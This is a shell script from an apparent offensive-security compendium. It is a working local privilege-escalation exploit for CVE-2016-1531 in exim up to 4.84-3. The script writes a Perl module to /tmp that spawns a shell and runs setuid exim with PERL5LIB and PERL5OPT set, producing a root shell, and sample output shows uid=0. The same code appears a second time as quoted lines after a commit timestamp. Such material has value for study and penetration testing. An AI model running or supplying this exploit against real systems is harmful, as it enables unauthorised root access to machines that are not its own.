killchain-compendium/post_exploitation/priv_esc/suid/exim/cve-2016-1531.sh

#!/bin/sh
# CVE-2016-1531 exim <= 4.84-3 local root exploit
# ===============================================
# you can write files as root or force a perl module to
# load by manipulating the perl environment and running
# exim with the "perl_startup" arguement -ps. 
#
# e.g.
# [fantastic@localhost tmp]$ ./cve-2016-1531.sh 
# [ CVE-2016-1531 local root exploit
# sh-4.3# id
# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)
# 
# -- Hacker Fantastic 
echo [ CVE-2016-1531 local root exploit
cat > /tmp/root.pm << EOF
package root;
use strict;
use warnings;

system("/bin/sh");
EOF
PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps
second commit 2021-08-23 01:13:54 +02:00			`#!/bin/sh`
			`# CVE-2016-1531 exim <= 4.84-3 local root exploit`
			`# ===============================================`
			`# you can write files as root or force a perl module to`
			`# load by manipulating the perl environment and running`
			`# exim with the "perl_startup" arguement -ps.`
			`#`
			`# e.g.`
			`# [fantastic@localhost tmp]$ ./cve-2016-1531.sh`
			`# [ CVE-2016-1531 local root exploit`
			`# sh-4.3# id`
			`# uid=0(root) gid=1000(fantastic) groups=1000(fantastic)`
			`#`
			`# -- Hacker Fantastic`
			`echo [ CVE-2016-1531 local root exploit`
			`cat > /tmp/root.pm << EOF`
			`package root;`
			`use strict;`
			`use warnings;`

			`system("/bin/sh");`
			`EOF`
			`PERL5LIB=/tmp PERL5OPT=-Mroot /usr/exim/bin/exim -ps`